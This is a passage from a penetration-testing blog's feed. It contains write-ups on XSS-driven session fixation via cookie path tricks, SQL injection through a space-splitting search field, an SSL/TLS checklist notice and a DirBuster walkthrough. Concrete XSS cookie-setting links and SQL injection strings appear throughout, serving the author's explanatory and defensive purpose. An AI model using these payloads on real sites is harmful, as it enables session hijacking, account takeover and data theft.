<p>The <span style="color: red;">%0a</span> at the front of the XSS payload was used to start a new line and this was sufficient to act as a statement terminator after <code>var a = "foo"</code> (semi-colons were being stripped). But in order to inject a <code>path</code> attribute (discussed below) I did need a semi-colon in the cookie string. By running every character through a Burp Intruder attack, I saw which characters were allowed, which were stripped and which were returned encoded. By inserting <span style="color: blue;">:%0d</span> into the XSS payload :&amp;#13; was returned &#8211; yes, %0d was encoded but %0a (used above) came back fine! Being inside a string inside a JavaScript block &amp;#13; wasn&#8217;t seen as an HTML entity by the browser and thus wasn&#8217;t interpreted. This provided the semi-colon needed to create a <code>path</code> attribute.</p>
<p>The colon at the front was used because it looked like the session cookie was delimited in that way. That &#8220;xx01&#8243; might refer, for example, to an internal server for load-balancing. Anyway, whatever it did, the application tolerated the unusual suffix to the session cookie. So that explains the :%0d appended to the cookie value in the XSS payload. Now for the <code><span style="color: red;">path%3d/app/</span></code>&#8230;</p>
<h3>3. The victim logins in</h3>
<p>So, at this point, the attacker has set the MYSESSIONID cookie on the victim to be <code>NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13</code> via a reflected XSS attack. Now the victim goes to the login page at https://www.example.com/app/login or is bounced there by navigating to a part of the site that enforces authentication. At login two MYSESSIONID cookies are passed up. This is because one had been set earlier in a <code>Set-Cookie</code> response header the first time the victim hit the site, even if that was by visiting the XSS&#8217;ed page. The genuine MYSESSIONID has a <code>path</code> of / and a <code>domain</code> of .example.com. If I had set a cookie by XSS with no attributes my cookie would have had a <code>path</code> of /app/folder/ (to match the path of the page which set the cookie) and a <code>domain</code> of www.example.com (to match the domain of said page). This would mean my cookie would never be sent up to /app/login for authentication, hence the need to set a <code>path</code> as part of the XSS.</p>
<p>Furthermore, when two MYSESSIONID values were sent up, the application took the first value so I had to make sure my cookie was first. By setting a <code>path</code> of /app/, it trumped the real MYSESSIONID for having a better path match to /app/login. Thus it was listed first in the POST request with the credentials and became authenticated:</p>
<p><code>Cookie: MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13; MYSESSIONID=4GRc4jiKNeQIfsqh2:xx01</code></p>
<p>In contrast, the <code>domain</code> of a cookie does not govern precedence in a standardised way, it varies between browser. From memory I think my cookie (with a more specific domain match) was sent up first by IE but second by Chrome and Firefox. It&#8217;s not something you want to rely on. Neither could I overwrite the cookie because for that to happen the name, path and domain must match. That would mean having to change both attributes from their defaults but in this case I could only change one. This is because I&#8217;d need a second semi-colon to set a second attribute and in doing so, using the encoding trick above, the first attribute would be spoilt, e.g. I&#8217;d get</p>
<p><code>var a = "foo"<br />
document.cookie="MYSESSIONID=NDnQrZ6JsMHyJTBCw8n:xx01:&amp;#13;path=/app/<span style="color: red;">&amp;#13</span>;domain=.example.com";</code></p>
<p>Developing this proof-of-concept for this specific injection point was quite fiddly and took some persistence but it was worth it. For all of their filtering &#8211; and because they did not change the session cookie after authentication &#8211; this was a nice practical attack using an unauthenticated XSS. One take-away thought then: be sure to probe the XSS defences in full because you never know what might come back and how it could be of help!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/when-html-encoding-helped-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SQL Injection in Search Fields</title>
		<link>http://www.exploresecurity.com/sql-injection-in-search-fields/</link>
		<comments>http://www.exploresecurity.com/sql-injection-in-search-fields/#comments</comments>
		<pubDate>Thu, 25 Sep 2014 22:07:40 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=234</guid>
		<description><![CDATA[A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>A quick posting about a fun SQL injection I cracked last week (of course, it&#8217;s only when you&#8217;ve cracked them that they&#8217;re fun!). A colleague had found the classic sign of a problem &#8211; add a single quote and you get an error &#8211; but was having no luck doing anything more. I was getting nowhere with my test so I thought I&#8217;d take a look for a change of scene. The input field was in a search box so, for example, <code>search=keyword'</code> returned an error but <code>search=keyword''</code> was fine. Anything more exciting than that, however, such as <code>search=keyword' and '1'='1</code>, didn&#8217;t seem to work as expected: in this case, an error was returned instead of the same set of results that the normal <code>search=keyword</code> produced.<span id="more-234"></span></p>
<p>The first thing I did was to try to terminate the query as simply as possible with no funny business. So in went <code>search=keyword'--</code> but back came an error. It turned out that the injection point was inside a doubly nested query as <code>search=keyword'))--</code> worked, producing the same results as <code>search=keyword</code>. After a bit of faffing about it occurred to me that spaces might be the issue. So I tried <code>search=keyword'and'1'='1</code> (no spaces in there) and it worked! No error was returned &#8211; but it didn&#8217;t produce the same results as <code>search=keyword</code>, it returned no results at all. What produced the same results as <code>search=keyword</code> was <code>search=keyword'or'1'='1</code>. Okay, park that for now. I had found the main problem &#8211; and it was immediately clear what was going on.</p>
<p>With a developer&#8217;s hat on, what would you do if a user ran a search with multiple keywords? The obvious answer would be to split up the search terms with space as a delimiter, run a query on each one and then return all the results together. If that was true then <code>search=keyword' and '1'='1</code> was running a database query against three terms: <code>keyword'</code>, <code>and</code>, <code>'1'='1</code>. The first of these would fail (just like <code>search=keyword'</code> did), as would the last if it got that far. So next I tried <code>search=keyword'/**/and/**/'1'='1</code> using the inline SQL comment characters and got the same result. Again, using AND returned no results but using OR was like a normal query with <code>search=keyword</code>. I had seen this kind of behaviour once before but I couldn&#8217;t remember what the context was, which is why I&#8217;ve written it down this time!</p>
<h3>AND vs OR</h3>
<p>In general, AND within a SQL statement (and thus in SQL injection too) is restrictive, narrowing the result set, whereas OR is inclusive, widening the result set. But, as with all SQL injection, it all depends on the underlying query. So what could be happening here?</p>
<p>Again, with the developer hat on, what else might you do with a user&#8217;s search terms? Well, it would be nice if you searched a little more widely, using them as stubs. In fact some of the SQL errors were giving this away (thanks, guys): <em>Incorrect syntax near &#8216;%&#8217;</em>. The % character is, of course, a wildcard used with LIKE. So when I searched for <code>keyword</code>, somewhere in the resulting query was <code>LIKE '%keyword%'</code>. This perfectly explains the AND vs OR behaviour&#8230;</p>
<p>When I injected <code>search=keyword'and'1'='1</code> the resulting query included <code>LIKE '%keyword'and'1'='1%'</code>. So the AND clause I&#8217;d added was always evaluating to FALSE and hence no results were returned. Whereas injecting <code>search=keyword'or'1'='1</code> produced <code>LIKE '%keyword'or'1'='1%'</code>. Even though one half of the OR clause was evaluating to FALSE, overall it returned TRUE when I got a positive hit on the keyword.</p>
<p>Since the injection point was inside a doubly nested query and this was a black box test, I had no idea what the real query was, but this certainly made sense. I tried a few more injections to test the theory just for the hell of it:</p>
<ol>
<li>When I terminated the statement, AND and OR did their &#8220;usual&#8221; thing. Which is to say that <code>search=keyword'/**/and/**/1=1))--</code> produced the same result as <code>search=keyword</code> whereas <code>keyword'/**/or/**/1=1))--</code> produced lots of results. This is because I was now commenting out the final % along with the rest of the statement.</li>
<li>When I injected <code>search=keyword'and'1%'='1</code> I got the same results as if there had been no injection. This was the real proof. Now the resulting query would have included <code>LIKE '%keyword'and'1%'='1%'</code> so my AND clause evaluated to TRUE when I got a positive hit on the keyword.</li>
<li>Finally, for what it was worth, <code>search=word'and'1%'='1</code> produced the same result, showing that a % preceded the injection point.</li>
</ol>
<h3>sqlmap</h3>
<p>One of the things that makes a great tool is the ability to customise it for a particular attack scenario. And sqlmap offers that in abundance. In this case a &#8220;tamper&#8221; script, which transforms the payloads in some way, worked a treat. One of the built-in tamper scripts is &#8220;space2comment&#8221; &#8211; bingo! In fact running sqlmap with this script allowed it to find the injection point. Without the script, though, sqlmap would have been stuck because, to quote the <a href='https://github.com/sqlmapproject/sqlmap/wiki/Usage#tamper-injection-data'>wiki page</a>, &#8220;sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation&#8221;.</p>
<p>All this was a good reminder that, when things are getting tough, thinking like a developer can help to turn near-misses into exploitable flaws. Having said that, I&#8217;ve seen code in the past that I could never have guessed, when it was clear the developer wasn&#8217;t thinking at all!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/sql-injection-in-search-fields/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Session Fixation and XSS Working Hand-in-Hand</title>
		<link>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/</link>
		<comments>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/#comments</comments>
		<pubDate>Sat, 06 Sep 2014 22:05:41 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[Cookies]]></category>
		<category><![CDATA[session fixation]]></category>
		<category><![CDATA[web apps]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=212</guid>
		<description><![CDATA[Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Often a combination of security flaws come together to produce a unique attack vector. Individually the flaws may not amount to much but together they make an interesting combo. This is invariably more interesting from a pentesting point of view because you know that a tool couldn&#8217;t positively find it. Session fixation is one such scenario because usually a few requirements must be met for the attack to work. I thought I&#8217;d write up a recent session fixation flaw because the act of forcing the cookie onto the victim involved a little twist on overwriting session cookies that made a reflective XSS attack last a lot longer while also laughing in the face of <code>httponly</code>.<span id="more-212"></span></p>
<p>As long as an attacker can remotely force the victim to use a known session cookie that becomes authenticated, you&#8217;ve found session fixation, but it&#8217;s one of those flaws that can be achieved in multiple ways that are subtly different from one another. In this particular instance the session fixation attack ran like this:</p>
<h3>1. The attacker makes up a session cookie</h3>
<p>Yes, the application accepted client-generated cookies.</p>
<h3>2. The attacker makes a specific request using the fabricated cookie</h3>
<p>This was a bit odd but if the session cookie from a request was not recognised by the application (whether it was made up or, more usually, it had just been set by the previous response page) then a background XHR request was made that effectively &#8220;authorised&#8221; the cookie. Okay, whatever, so the attacker does this.</p>
<h3>3. The login page suffered from XSS so the attacker crafts a malicious link to set the known cookie on the victim.</h3>
<p>The malicious link was something like this (I&#8217;ve removed the URL-encoding to make it easier to read):</p>
<p style="padding-left: 30px;"><code>https://www.example.com/login?param="&gt;&lt;script&gt;document.cookie="PHPSESSID=attackerCookie; path=/login; expires=Tue, 06-Aug-2024 00:00:01 GMT"&lt;/script&gt;</code></p>
<p>In more &#8220;traditional&#8221; session fixation the attacker&#8217;s cookie is a parameter in the request that the attacker tricks the victim into making, so using XSS seems a bit like cheating. Unfortunately (for me) the application didn&#8217;t accept a session cookie in the &#8220;traditional&#8221; way and XSS was my only option. OWASP does credit XSS in its description of <a href="https://www.owasp.org/index.php/Session_fixation">session fixation</a> but, that aside, not only did XSS help the session fixation attack but the session fixation flaw helped the XSS attack&#8230;One reason for this was that a simple <code>document.cookie</code> session hijack through XSS was restricted by the response to the above request:</p>
<p style="padding-left: 30px;"><code>Set-Cookie: PHPSESSID=serverCookie; path=/; secure; HttpOnly</code></p>
<p>Because of the <code>httponly</code> flag, the XSS payload could not pull out the session cookie and send it to the attacker. Of course, many other interesting XSS options are still possible, such as rewriting the form&#8217;s <code>action</code> attribute so that the login credentials would be sent to the attacker. However, one advantage of the session fixation approach (apart from the interest of seeing it working) is that <em>nothing</em> is sent to the attacker. Furthermore, as I&#8217;ll explain later (and you may have already spotted from the XSS payload) this attack has the potential to be more long-term than knowing the username and password.</p>
<p>The <code>httponly</code> flag has another effect: the XSS payload can neither read it nor overwrite it. This behaviour isn&#8217;t standardised, it&#8217;s one of those grey areas that Michal Zalewski covers <a href="https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies">so</a> <a href="http://lcamtuf.coredump.cx/tangled/">well</a> but in this case it&#8217;s not so grey. IE 10, Chrome 37 and Firefox 30 all behaved in the same way. But you might have noticed that the XSS payload included a <code>path</code> of /login when it set the session cookie. This is where the attacker wins as now the browser doesn&#8217;t see this as an overwrite but as a different cookie altogether&#8230;</p>
<h3>4. The victim logs in and the session cookie becomes authenticated</h3>
<p>The server-generated session cookie included a <code>path=/</code> directive so when the victim logs in to /login the attacker&#8217;s cookie has precedence (in that it&#8217;s listed first) because the path is a more specific match to the target page:</p>
<p style="padding-left: 30px;"><code>Cookie: PHPSESSID=attackerCookie; PHPSESSID=serverCookie</code></p>
<p>The application processed the first cookie with the login, thus the attacker&#8217;s fabricated cookie became authenticated and was associated with the victim&#8217;s account. Of course if the session cookie had been changed after authentication, which is best practice, the attack would have failed. Note that the attacker can also set the <code>domain</code> attribute of the cookie to .example.com to try to widen the impact of the attack.</p>
<h3>5. The attacker uses the known session cookie to masquerade as the victim</h3>
<p>The last thing to mention is the long-term nature of this attack. Although logging off did detach the session cookie from the victim&#8217;s account, leaving it unauthenticated, the application did not clear it (again, best practice). So the next time the website is visited, the attacker&#8217;s session cookie will again be offered, accepted and authenticated. Because the XSS payload effectively makes the cookie permanent by setting a long expiry date, the attacker has access to the account of anyone that logs in using the compromised browser in the future. Of course, the persistence of the attack dies as soon as the browser&#8217;s cookie cache is cleared &#8211; but how often does that happen? For what is, after all, a <em>reflected</em> XSS attack, you&#8217;d be certain to get a good return. Indeed, if the browser is shared among users (e.g. at home or at internet kiosks), a single XSS attack can exploit multiple users of the website, making it a one-to-many attack, which you don&#8217;t tend to associate with reflective XSS.</p>
<p>I&#8217;m not claiming any of this is particularly novel, by the way. I just enjoyed finding the XSS path trick for myself and using it with session fixation to poke fun at <code>httponly</code> and to create a more persistent version of a reflective XSS attack. It also demonstrated that best practice points, although seemingly trivial when taken alone, can help to stop or mitigate more complex attacks.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/session-fixation-and-xss-working-hand-in-hand/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SSL/TLS Checklist for Pentesters</title>
		<link>http://www.exploresecurity.com/ssltls-checklist-for-pentesters/</link>
		<comments>http://www.exploresecurity.com/ssltls-checklist-for-pentesters/#comments</comments>
		<pubDate>Mon, 07 Jul 2014 21:58:26 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[SSL/TLS]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[SSL]]></category>
		<category><![CDATA[TLS]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=201</guid>
		<description><![CDATA[I gave a presentation at BSides MCR 2014 on the subject of SSL and TLS checks from a pentesting viewpoint. The idea was to focus on the pitfalls of testing, why the tools may let you down and how to check for issues manually (as much as possible), often using OpenSSL. The slides can be [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>I gave a presentation at BSides MCR 2014 on the subject of SSL and TLS checks from a pentesting viewpoint. The idea was to focus on the pitfalls of testing, why the tools may let you down and how to check for issues manually (as much as possible), often using OpenSSL.<span id="more-201"></span></p>
<p>The slides can be found <a href="https://www.slideshare.net/exploresecurity/ssltls-checklist-for-pentesters-bsides-mcr-2014">here</a>.</p>
<h3>Cheatsheet</h3>
<p>UPDATE 7th September 2014: I&#8217;ve now written a table that pulls together the manual checks discussed in the presentation &#8211; plus a few more (which will appear in any future presentations). Since tables are a pain in WordPress and I don&#8217;t want to risk a plugin at this time of night, you can find a (lazy) HTML table <a href="http://www.exploresecurity.com/wp-content/uploads/custom/SSL_manual_cheatsheet.html">here</a>.</p>
<p>For updates on content and future presentations <a href="https://twitter.com/exploresecurity">follow me</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.exploresecurity.com/ssltls-checklist-for-pentesters/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Three Cheers for DirBuster</title>
		<link>http://www.exploresecurity.com/three-cheers-for-dirbuster/</link>
		<comments>http://www.exploresecurity.com/three-cheers-for-dirbuster/#comments</comments>
		<pubDate>Fri, 04 Jul 2014 09:29:23 +0000</pubDate>
		<dc:creator>Jerome</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Web Applications]]></category>
		<category><![CDATA[DirBuster]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://www.exploresecurity.com/?p=183</guid>
		<description><![CDATA[Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Not exactly wizard stuff today, more like back to basics perhaps &#8211; but sometimes they&#8217;re worth revisiting. I&#8217;ve had some good DirBuster finds three tests in a row so I thought I&#8217;d write them up as a case study. It&#8217;s a reminder that there&#8217;s some very low-hanging fruit out there that may not always get picked. I&#8217;ve also put together a walk-through for many of DirBuster&#8217;s features and I aim to show that, as with many tools, a few minutes of manual work can produce a faster set of more meaningful results.<span id="more-183"></span></p>
<p>If you know what DirBuster is then you can skip this paragraph. If you don&#8217;t, then DirBuster is designed to brute-force directory and file names on web servers, the point being to find content to which there are no links. It&#8217;s an <a href="https://www.owasp.org/index.php/About_OWASP">OWASP</a> project and you can find it <a href="https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project">here</a>. While you can run it in a pure brute-force mode, you&#8217;ll most likely be using a dictionary to maximise your chances of finding something in the time available. DirBuster comes with a set of dictionaries that were generated by crawling the internet for real directory and file names.</p>
<h2>Cheer number 1</h2>
<p>On a test of a web portal DirBuster found pages at <code>/users/</code> and <code>/organisations/</code>. The portal was a closed system used by the owner to exchange financial information with many other organisations in (what was supposed to be) an isolated way. Sorry to be vague but you understand why! Navigating to <code>/users/</code> opened up a whole user management area, with full names, email addresses, roles, last login etc. At <code>/organisations/</code> there was an organisation management area, from where you could access the same user details from other organisations. Oops. While unauthorised data access was possible, attempts to execute administrative functions failed &#8211; but the fact that these functions were exposed was useful in itself because there was no CSRF protection. Moreover it was simple to target an administrator (of any organisation) because you could look them up from the user listings. The only saving grace was that you had to be authenticated &#8211; a point I&#8217;ll return to later.</p>
<h2>Cheer number 2</h2>
<p>On a public website for a high-street company, DirBuster found the page <code>/staff/</code>. This revealed a staff discount page where you could go through and order stuff at significant discounts, meaning lost revenue to the client. Of course, this sort of thing has a habit of getting out on to discount sites and the like. The page was available unauthenticated (although since anyone could register for an account, that&#8217;s by the bye).</p>
<p>Cheer number 2½: DirBuster also found a page that had a special offer for readers of a particular publication. Not as important this one since it was obviously there for the taking but it clearly wasn&#8217;t designed to be available to all.</p>
<h2>Cheer number 3</h2>
<p>On a test of a web portal, while authenticated, DirBuster found a positive response from <code>/admin</code>. This turned out to be an authorisation flaw and a short time later, after some fuzzing of user IDs, I had some 2,300 usernames and email addresses as well as plaintext passwords for about a third of those accounts. This portal was used by many different organisations &#8211; and a user from one of them could log in to another user&#8217;s account from another organisation. Oops.</p>
<p>In fact I had a fourth cheer yesterday, where I found a page that allowed me to self-register unauthenticated on (what was supposed to be) a <em>closed</em> site! But &#8220;four cheers for DirBuster&#8221; sounds a bit naff.</p>
<h2>Walk-through</h2>
<p>The rest (and majority) of this article is a walk-through of the main DirBuster configuration options. <em><span style="text-decoration: underline;">Note</span> that I&#8217;m describing a general case in what follows and obviously there may be times when you need to do things differently. That&#8217;s an important part of pentesting: adapting your test to suit the target</em>. Having said that, let&#8217;s take a look at the starting screen (of version 1.0 RC1, on which this article is based):</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png"><img class="aligncenter size-full wp-image-188" alt="DirBuster main screen" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-main-screen.png" width="769" height="589" /></a></p>
<h3>Target URL</h3>
<p>For the &#8220;Target URL&#8221; consider HTTP vs HTTPS. HTTP is obviously faster but a website will often redirect some or all requests to the HTTPS equivalent whether the page is actually there or not, which will spoil your results. You can enable &#8220;Follow Redirects&#8221; from the Options menu but that&#8217;s a considerable overhead if it&#8217;s happening with every request. If the redirect happens only when the page exists then a HTTP-based scan should be speedier. My personal preference is that if the site is happy delivering HTTP pages over HTTPS, which is normal, I&#8217;ll go for HTTPS. Despite the overhead slowing down the request rate, it does tend to rule out excessive redirects since it would be unusual for a HTTPS request to be redirected to a HTTP equivalent. Redirects may also confuse the &#8220;fail case&#8221;, which DirBuster uses to decide how it knows whether or not a guess is correct, which could lead to false negatives as well as false positives. More on this later.</p>
<p>A similar situation may arise with the <em>domain</em> in that <span style="text-decoration: underline;">https://site.com/page</span> may always redirect to <span style="text-decoration: underline;">https://<strong>www</strong>.site.com/page</span> so use <span style="text-decoration: underline;">https://www.site.com:443</span> as your base URL.</p>
<h3>Work Method</h3>
<p>The default &#8220;Auto Switch&#8221; mode is probably best for the majority of cases. DirBuster will first try to see if it can get sensible results from HEAD requests, the reason being that the responses will be smaller. Even though it makes a GET request on 200 responses, this will save time when the 404 message (or equivalent) is relatively large. On the site I was looking at when writing this bit, the full HTML 404 response was about 19kB bigger than the disembodied 404 set of headers you&#8217;d get with HEAD. A crude bit of testing showed this took on average twice as long to arrive and be processed, adding 200ms to the response time. Given that you&#8217;re getting 404s most of the time this could mean a saving, even with the small dictionary, of over 1.4 gigabytes or 4 hours of waiting!</p>
<h3>Number Of Threads</h3>
<p>Running DirBuster with a high number of threads can slow down the target server, which may not go down too well if you&#8217;re testing a live site. You&#8217;ll probably find the default (10) to be a little over-enthusiastic, especially as you&#8217;ll be running other tests simultaneously. If you examine the number of threads in the DirBuster process (javaw.exe) while it&#8217;s running, you&#8217;ll see it jump up by more than the number you set in this field. I haven&#8217;t looked at the source code but I&#8217;m assuming that DirBuster is indeed honouring this field. I imagine that the &#8220;number of threads&#8221; refers to &#8220;Workers&#8221; that handle the actual requests and responses over the network while the other threads, for example, manage different queues depending on what you tick at the bottom of the screen.</p>
<p><span style="line-height: 1.714285714; font-size: 1rem;">As an aside, I&#8217;ve noticed that when you run a number of scans without re-starting DirBuster, the number of threads at rest tends to increase. I&#8217;m not sure if this is an issue that could degrade performance but just bear it in mind. </span><span style="line-height: 1.714285714; font-size: 1rem;">(I did try to contact the project lead, James Fisher, to ask about threading but I got no reply. And it&#8217;s not that big a deal to warrant rummaging through the source code!)</span></p>
<p>I have DirBuster running on another monitor so I can keep an eye on the requests per second and any sudden scrolling, which usually means errors! Bear in mind that, say, 20 requests per second over HTTP<strong>S</strong> will be working the server harder than 20 requests per second over HTTP. A nice feature is that once the scan is running, you can dynamically change the number of threads.</p>
<h3>Dictionary</h3>
<p>Assuming you opt for &#8220;List based brute force&#8221; you&#8217;ll now need to choose a dictionary &#8211; and for this you need to know whether or not your directories are case sensitive. Although you can often guess this from the server in use, e.g. IIS isn&#8217;t case sensitive, it&#8217;s always best to check. So test a page that you know to exist, i.e. does <code>/page</code> return the same as <code>/Page</code>? Even when the server is case-sensitive, a look over the site map in your web proxy may show that all the pages you&#8217;ve requested are in fact lower case. But don&#8217;t go thinking that using the case-sensitive lists will take all that much longer. Clicking &#8220;List Info&#8221; brings up some statistics on the dictionaries, a portion of which is shown below:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png"><img class="aligncenter size-full wp-image-187" alt="DirBuster dict list info" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-dict-list-info.png" width="531" height="354" /></a></p>
<p>You can see that the case-sensitive lists are nowhere near even twice the size of the lowercase versions, which you might have imagined as a minimum. That&#8217;s because the lists are based on <em>real</em> names found by crawling the internet. The file &#8220;directory-list-2.3-small.txt&#8221; has 87,650 entries while the lowercase version has 81,629 entries so it&#8217;s only 6,021 entries longer (about 7% bigger). For the medium-sized lists the numbers are 220,546 vs 207,629 so the case-sensitive version is 12,917 entries longer (about 6% bigger). So using the case-sensitive lists may not involve as big a hit as you might expect. (You can also see from the List Info what the actual difference is between big, medium and little: the entries were found on at least 1, 2 and 3 hosts respectively.)</p>
<p>Before you even start your attack you could consider putting together a small dictionary of a few directories and files you&#8217;ve found, together with some gibberish entries, to use on a test run. If you don&#8217;t see the results you expect, review your configuration bearing in mind some of the points from this article. A short test run might save you hours of wasted effort.</p>
<h3>Starting options</h3>
<p>The &#8220;Standard start point&#8221; will assume directories end with / and files end with whatever you configure underneath. The &#8220;URL Fuzz&#8221; option allows you to insert the dictionary entries into the URL in a non-standard way. A good illustration is to discuss why there&#8217;s an Apache user enumeration list included in the set of dictionaries (apache-user-enum-2.0.txt). This is because if the <code>userdir</code> module is enabled (more on this <a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html">here</a>) you can go hunting for usernames based on the fact that the user &#8220;bob&#8221; will have a folder mapped to <span style="text-decoration: underline;">http://site.com/~bob/</span>. So in this example the URL to fuzz would be <code>/~{dir}/</code> where <code>{dir}</code> is a placeholder for the words in the chosen dictionary.</p>
<p>The remaining options are self-explanatory but there are still a few things to consider. Obviously the more options you tick the longer the scan will take. So look first at the style of URL the website uses. For example, you might find that requests to <code>/page</code> produce redirects to <code>/page/</code> or that both of these return the same response. Either way, don&#8217;t run &#8220;Brute Force Dirs&#8221; together with &#8220;Brute Force Files&#8221;+&#8221;Use Blank Extension&#8221; because you&#8217;re doing twice the amount of work to get the same result. Conversely if you spot that there doesn&#8217;t seem to be much content in directories, i.e. none of the pages end with a / character, then don&#8217;t run &#8220;Brute Force Dirs&#8221;, rely on &#8220;Brute Force Files&#8221; instead.</p>
<p>If you enable the &#8220;Be Recursive&#8221; option, remember that DirBuster&#8217;s multi-threaded approach means that all those queues of work will be competing for a limited set of Workers. It&#8217;s easy to get into a situation where the Workers are looking in sub-folders of no real interest, slowing down the search for better candidates. In a time-limited test you could try looking at just the root content first by disabling this option. Where you go from there can be both manual and automated &#8211; and there&#8217;s always the option to create a custom dictionary for further scans based on the results of the first scan.</p>
<h3>Options Menu</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png"><img class="aligncenter size-full wp-image-189" alt="DirBuster options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-options.png" width="309" height="246" /></a></p>
<p>I&#8217;ve already mentioned &#8220;Follow Redirects&#8221; &#8211; in general, tick this only if you have to because it has the capacity to slow down the scan. Without this ticked, you&#8217;ll see 301 and 302 responses in the final results and you can just manually target the ones of interest later.</p>
<p>Choosing &#8220;Debug Mode&#8221; will only make a difference if you&#8217;re launching DirBuster from a command window that remains open in the background:</p>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png"><img class="aligncenter size-full wp-image-186" alt="DirBuster debug" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-debug.png" width="736" height="264" /></a></p>
<p>The references to Worker[n] are to the threads doing the networking so for n threads that you set you&#8217;ll see Workers from [0] to [n-1].</p>
<p>The option &#8220;Parse HTML&#8221;, which is on by default, instructs DirBuster to read the HTML of files that it discovers, looking for files and folders it then doesn&#8217;t have to guess. These can be found, for example, in the <code>href</code> attributes of <code>&lt;a&gt;</code> tags. You might decide this is overkill since DirBuster will quickly begin to download a lot of stuff you&#8217;ll see elsewhere during testing e.g. in Burp&#8217;s Proxy and Site Map. Overall this may add an overhead for results you simply don&#8217;t need &#8211; at least not from this tool on the first scan. There&#8217;s another possible benefit to disabling this when running authenticated scans, which we&#8217;ll come to momentarily.</p>
<h3>Advanced Options</h3>
<p><a href="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png"><img class="aligncenter size-full wp-image-185" alt="DirBuster advanced options" src="http://www.exploresecurity.com/wp-content/uploads/2014/07/DirBuster-advanced-options.png" width="620" height="626" /></a></p>
<p>I&#8217;ll skip the first two tabs, which are self-explanatory, and start with the tab that&#8217;s active in the screenshot above&#8230;</p>
<h4>Http Options</h4>
<p>First, DirBuster allows you to add custom headers to your requests so you could, for example, add an authenticated session management cookie. <em>Whoa! Did you say run an automated scanning tool authenticated?</em> Yes I did. After getting a feel of the site you may be comfortable doing this &#8211; it can pull out some interesting finds (as shown by the case studies at the start of this article). Anything you find authenticated that you didn&#8217;t find unauthenticated is really worth a look. Although the risk of side effects is much lower than running a full-on active web application scanner authenticated across a site, of course I have to say that it&#8217;s not without risk! I disable &#8220;Parse HTML&#8221; and &#8220;Be Recursive&#8221; as a safety measure.</p>
<p>Underneath is the &#8220;Http User Agent&#8221; and you can see the default looks nothing like a real User-Agent string. If you&#8217;re getting odd results from DirBuster that you&#8217;re not seeing in Burp, you could try changing that option, e.g. to &#8220;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0&#8243;.</p>
<p>Lastly, the option to use a proxy is useful for troubleshooting &#8211; as well as learning! You could also take advantage of your upstream proxy&#8217;s features to handle more complex cases (adding an overhead, of course).</p>
<h4><span style="line-height: 1.714285714; font-size: 1rem;">Scan Options</span></h4>
